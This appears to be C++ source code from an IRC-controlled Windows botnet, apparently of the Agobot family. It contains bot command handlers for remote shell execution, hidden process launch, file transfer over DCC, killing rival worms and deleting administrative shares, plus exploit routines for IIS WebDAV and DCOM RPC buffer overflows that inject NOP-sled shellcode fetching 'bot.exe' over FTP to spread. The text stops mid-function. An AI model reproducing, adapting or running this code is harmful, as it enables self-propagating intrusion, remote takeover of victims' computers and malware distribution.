bool CMac::HandleCommand(CMessage *pMsg) { if(!pMsg->sCmd.Compare("login")) { if(g_pMainCtrl->m_cMac.AddLogin(pMsg->sChatString.Token(1, " ", true), pMsg->sChatString.Token(2, " ", true), pMsg->sSrc, pMsg->sHost, pMsg->sIdentd)) { CString sReply; sReply.Format("Password accepted."); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); return true; } else return false; } else if(!pMsg->sCmd.Compare("mac.logout")) { if(g_pMainCtrl->m_cMac.DelLogin(CString(""), pMsg->sSrc)) { CString sReply; sReply.Format("User %s logged out.", pMsg->sSrc.CStr()); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); return true; } else return false; } return false; }
bool CMac::CheckPassword(CString sPassword, user *pUser) { if(!sPassword.CStr()) return false; md5::MD5_CTX md5; md5::MD5Init(&md5); unsigned char szMD5[16]; CString sMD5; sMD5.Assign(""); md5::MD5Update(&md5, (unsigned char*)sPassword.Str(), sPassword.GetLength()); md5::MD5Final(szMD5, &md5); for(int i=0;i<16;i++) { CString sTemp; sTemp.Format("%2.2X", szMD5[i]); sMD5.Append(sTemp); } if(!pUser->sPassword.Compare(sMD5)) return true; return false; }
CString::CString(const CString& str) : length_(str.Length()) , reserved_(0) { if ((string_ = static_cast<char*>(::malloc(length_ + 1))) == 0) { base_throw(InternalError, "malloc failed"); } ::memcpy(static_cast<void*>(string_), str.Str(), length_); string_[length_] = '\0'; }
bool CScannerHTTP::ExploitIISWebDav(int iHTTPType, unsigned short sRet) { char szSCBuf[4096]; char szShellBuf[4096]; char *szReqBuf=(char*)malloc(100000); unsigned short ret=sRet; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=100, rt=0, r=0; CString sURL; if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); // Build a buffer with the shellcode memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Build the request memset(szReqBuf, 0, 100000); strcpy(szReqBuf, "SEARCH /"); unsigned int j, i=strlen(szReqBuf); szReqBuf[i]='\x90'; for(j=i+1; j<i+2150; j+=2) { *(unsigned short*)&szReqBuf[j]=(unsigned short)ret; } // EIP will be szReqBuf[8+2087] for(;j<i+65535-strlen(jumpcode);j++) szReqBuf[j]='\x90'; // The rest is padded with NOP's. RET address should point to this zone! memcpy(&szReqBuf[j], jumpcode, strlen(jumpcode)); // Then we skip the body of the HTTP request strcpy(szReqBuf+strlen(szReqBuf), " HTTP/1.1\r\n"); sprintf(szReqBuf+strlen(szReqBuf), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", m_sSocket.m_szHost, strlen(body)+iShellSize); strcpy(szReqBuf+strlen(szReqBuf), body); memset(szReqBuf+strlen(szReqBuf), 0x01, 1); memset(szReqBuf+strlen(szReqBuf), 0x90, 3); strcpy(szReqBuf+strlen(szReqBuf), szSCBuf); iReqSize=strlen(szReqBuf); // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, 80)) // Connect failed, exit { free(szReqBuf); return false; } // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); free(szReqBuf); return false; } // Read reply m_sSocket.RecvTO(szReqBuf, sizeof(szReqBuf), 5000); // Close the socket that was once funky fresh m_sSocket.Disconnect(); free(szReqBuf); return true; }
bool CBot::HandleCommand(CMessage *pMsg) { // ID if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); } // Execute else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr())) { CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1; #ifdef WIN32 CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo); if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE; if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } #endif return true; } // Remove Bot else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) { CString sNick(pMsg->sChatString.Token(1, " ", true)); if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) { if(g_cMainCtrl.m_cBot.as_enabled.bValue) g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue); if(g_cMainCtrl.m_cBot.as_service.bValue) g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue); g_cMainCtrl.m_cInstaller.Uninstall(); g_cMainCtrl.m_cIRC.m_bRunning=false; g_cMainCtrl.m_bRunning=false; } } // About else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); } // Flush DNS else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) { #ifdef WIN32 // ipconfig.exe /flushdns Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr()); #endif return true; } // Open File else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) { CString sText; sText=pMsg->sChatString.Token(1, " ").CStr(); CString bRet; bRet=(char)ShellExecute( NULL, "open", sText.CStr(), NULL, NULL, SW_SHOWNORMAL ); // bRet=system(sText.CStr())>0; // if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str()); //else return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); } // Quit else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) { g_cMainCtrl.m_cIRC.m_bRunning=false; return true; } // DNS else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) { CString sReply; hostent *pHostent=NULL; in_addr iaddr; if(!pMsg->sChatString.Token(1, " ").Compare("")) return false; unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr()); if(addr!=INADDR_NONE) { pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET); if(pHostent) { sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else { pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr()); if(pHostent) { iaddr=*((in_addr*)*pHostent->h_addr_list); sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr)); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } if(!pHostent) { sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr()); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } // Random Nickname else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) { CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr()); g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr()); return true; } // Run Command else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) { #ifdef WIN32 if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; CString sReplyBuf; sReplyBuf.Format("Executed: %s.", sText.CStr()); if(system(sText.CStr())==-1) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } else { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; } #endif return true; } // System Information else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); } // Find Files //else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) // { /* CString strMask = pMsg->sChatString.Token(1, " "); CString strDir = pMsg->sChatString.Token(2, " "); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); */ //} // Change Nickname else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) { g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr()); return true; } // Uptime check (default: 7d) else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) { int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7; CString sUptime=LongUptime(iDays); if(sUptime.Compare("")) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ sUptime.Str(), pMsg->sReplyTo.Str()); } return true; } // Secure Bot else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) { #ifdef WIN32 CString regLoc; regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr(); HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr()); CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr()); RegCloseKey(hkey); KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr()); RegCloseKey(hkey); system("net share c$ /delete /y"); system("net share d$ /delete /y"); system("net share ipc$ /delete /y"); system("net share admin$ /delete /y"); #endif return true; } return false; }
bool CScannerDCOM2::Exploit() { char szRecvBuf[4096], szSCBuf[4096], szLoadBuf[4096], szReqBuf[4096], szShellBuf[4096], szLoaderBuf[4096]; int iShellSize=0, iLoaderSize=0, iPos=0, iSCSize=0, iLoadSize=0, iReqSize=0; char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC); if(iHostOS==OS_UNKNOWN || iHostOS==OS_WINNT) return false; CString sURL; if(IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_pIRC->m_lLocalAddr)), \ g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); iLoaderSize=encrypt_shellcode(dcom2_loader, sizeof(dcom2_loader), szLoaderBuf, sizeof(szLoaderBuf), NULL); memcpy(szLoadBuf+iPos, dcom2_shellcode_buf, sizeof(dcom2_shellcode_buf) ); iPos+=sizeof(dcom2_shellcode_buf); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, szLoaderBuf, iLoaderSize ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_SC, dcom2_shellcode_adduser,sizeof(dcom2_shellcode_adduser) ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_JMP_ADDR, &dcom2_my_offsets[0].lJmpAddr, 4 ); memcpy(szLoadBuf+DCOM2_SCBUF_OFFSET_TOP_SEH, &dcom2_my_offsets[0].lTopSEH, 4 ); iLoadSize=iPos; iPos=0; // Build the request memcpy(szReqBuf+iPos, dcom2_request1, sizeof(dcom2_request1)-1 ); iPos+=sizeof(dcom2_request1)-1; memcpy(szReqBuf+iPos, dcom2_request2, sizeof(dcom2_request2)-1 ); iPos+=sizeof(dcom2_request2)-1; memcpy(szReqBuf+iPos, szLoadBuf, iLoadSize ); iPos+=iLoadSize; memcpy(szReqBuf+iPos, dcom2_request3, sizeof(dcom2_request3)-1 ); iPos+=sizeof(dcom2_request3)-1; memcpy(szReqBuf+iPos, dcom2_request4, sizeof(dcom2_request4)-1 ); iPos+=sizeof(dcom2_request4)-1; iReqSize=iPos; iPos=0; pTemp=szReqBuf+sizeof(dcom2_request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iLoadSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iLoadSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iLoadSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iLoadSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iLoadSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iLoadSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iLoadSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iLoadSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iLoadSize - 12; char szAssocGroup[4]; // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit return false; // Send the bind string if(!m_sSocket.Write(dcom2_bindstr, sizeof(dcom2_bindstr)-1)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))) { m_sSocket.Disconnect(); return false; } // Check for DCE_PKT_BINDACK if(szRecvBuf[2]!=DCE_PKT_BINDACK) { m_sSocket.Disconnect(); return false; } // Store the association group for later usage memcpy(szAssocGroup, szRecvBuf+20, 4); // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.Recv(szRecvBuf, sizeof(szRecvBuf))) { m_sSocket.Disconnect(); return false; } // Check for DCE_PKT_FAULT if(szRecvBuf[2]==DCE_PKT_FAULT) { m_sSocket.Disconnect(); return false; } // Close the socket that was once funky fresh m_sSocket.Disconnect(); return true; }
bool CDccCommand::HandleCommand(CMessage *pMsg) { if(!pMsg->sCmd.Compare(m_cmdDccSend.sName.Str())) { DCC dcc; dcc.filename=pMsg->sChatString.Token(1, " ", true); char sendbuf[IRCLINE],buffer[1024],tmpfile[MAX_PATH]; int Fsend, bytes_sent; unsigned int move; unsigned __int64 totalbytes = 0; DWORD mode = 0; SOCKET ssock; while (1) { if ((ssock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) { sprintf(sendbuf,"[DCC]: Failed to create socket."); break; } SOCKADDR_IN csin, ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = htons(0);//random port ssin.sin_addr.s_addr = INADDR_ANY; if (bind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != 0) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: failed to bind socket", pMsg->sReplyTo.Str()); break; } int ssin_len = sizeof(ssin); getsockname(ssock, (LPSOCKADDR)&ssin, &ssin_len); unsigned short portnum = ntohs(ssin.sin_port); char tmpdccfile[IRCLINE]; strcpy(tmpdccfile,dcc.filename.Str()); for (unsigned int i=0;i <= strlen(tmpdccfile); i++) tmpfile[i] = ((tmpdccfile[i] == 32)?(95):(tmpdccfile[i])); if (listen(ssock, 1) != 0) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: failed to open socket", pMsg->sReplyTo.Str()); break; } HANDLE testfile = CreateFile(dcc.filename.CStr(),GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0); if (testfile == INVALID_HANDLE_VALUE) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: file doesn't exist", pMsg->sReplyTo.Str()); sprintf(sendbuf,"[DCC]: File doesn't exist."); break; } int length = GetFileSize(testfile,NULL); CString dccOutPut; dccOutPut.Format("\1DCC SEND %s %i %i %i\1", dcc.filename.CStr(), htonl(inet_addr(GetIP(g_cMainCtrl.m_cIRC.m_sSocket))), portnum, length); g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, dccOutPut.Str(), pMsg->sSrc); TIMEVAL timeout; timeout.tv_sec = 60;//timeout after 60 sec. timeout.tv_usec = 0; fd_set fd_struct; FD_ZERO(&fd_struct); FD_SET(ssock, &fd_struct); if (select(0, &fd_struct, NULL, NULL, &timeout) <= 0) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: timeout", pMsg->sReplyTo.Str()); break; } int csin_len = sizeof(csin); if ((dcc.csock = accept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: unable to open socket", pMsg->sReplyTo.Str()); break; } closesocket(ssock); while (length) { Fsend = 1024; if (Fsend>length) Fsend=length; move = 0-length; memset(buffer,0,sizeof(buffer)); SetFilePointer(testfile, move, NULL, FILE_END); ReadFile(testfile, buffer, Fsend, &mode, NULL); bytes_sent = send(dcc.csock, buffer, Fsend, 0); totalbytes += bytes_sent; if (recv(dcc.csock,buffer ,sizeof(buffer), 0) < 1 || bytes_sent < 1) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "dcc: socket error", pMsg->sReplyTo.Str()); closesocket(dcc.csock); //clearthread(dcc.threadnum); ExitThread(1); } length = length - bytes_sent; } if (testfile != INVALID_HANDLE_VALUE) CloseHandle(testfile); CString strTransMsg; strTransMsg.Format("dcc: complete to %s, file: %s, (%d bytes)", inet_ntoa(csin.sin_addr), dcc.filename.Str(), totalbytes); g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, strTransMsg.Str(), pMsg->sReplyTo.Str()); break; } if (ssock > 0) closesocket(ssock); closesocket(dcc.csock); //clearthread(dcc.threadnum); ExitThread(0); } return FALSE; }
bool CScannerDCOM::Exploit() { switch(m_sSocket.m_sPort) { case 135: case 1025: { char szRecvBuf[4096]; char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096]; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1; char *pTemp; int iHostOS=FpHost(m_sSocket.m_szHost, FP_RPC); if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB); if(iHostOS==OS_WINNT) return false; CString sURL; if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); // Build a buffer with the shellcode memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Prepend NOPs as long as shellcode doesn't fit RPC packet format while(iSCSize%16!=12) { char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++; memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; free(szTemp); } // Set the return address if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN) memcpy(szSCBuf+36, (char*)&my_offsets[1], 4); else memcpy(szSCBuf+36, (char*)&my_offsets[0], 4); // Build the request memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1; memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1; memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize; memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1; memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1; iReqSize=iPos; pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes *(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf; *(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12; *(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12; *(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12; *(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12; *(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12; *(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12; *(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12; *(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12; // Connect to the server if(!m_sSocket.Connect(m_sSocket.m_szHost, m_sSocket.m_sPort)) // Connect failed, exit return false; // Send the bind string if(!m_sSocket.Write(bindstr, sizeof(bindstr)-1)) { m_sSocket.Disconnect(); return false; } // Read reply m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000); // Send the evil request if(!m_sSocket.Write(szReqBuf, iReqSize)) { m_sSocket.Disconnect(); return false; } // Read reply if(!m_sSocket.RecvTO(szRecvBuf, sizeof(szRecvBuf), 5000)) { m_sSocket.Disconnect(); return false; } // Close the socket that was once funky fresh m_sSocket.Disconnect(); return true; } break; case 445: { #ifdef _WIN32 NETRESOURCEW nr; bool bRetVal=false; if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal; else { int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP); if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB); char szPipePath[MAX_PATH]; sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost); HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \ NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if(hFile!=INVALID_HANDLE_VALUE) { SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost); char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096]; int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1; char *pTemp; CString sURL; if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost)) sURL.Format("ftp://*****:*****@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); else sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \ g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue); iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false); // Build a buffer with the shellcode memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize; iSCSize=iPos; iPos=0; // Prepend NOPs as long as shellcode doesn't fit RPC packet format while(iSCSize%16!=12) { char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++; memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1; memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize; memcpy(szSCBuf+iPos, 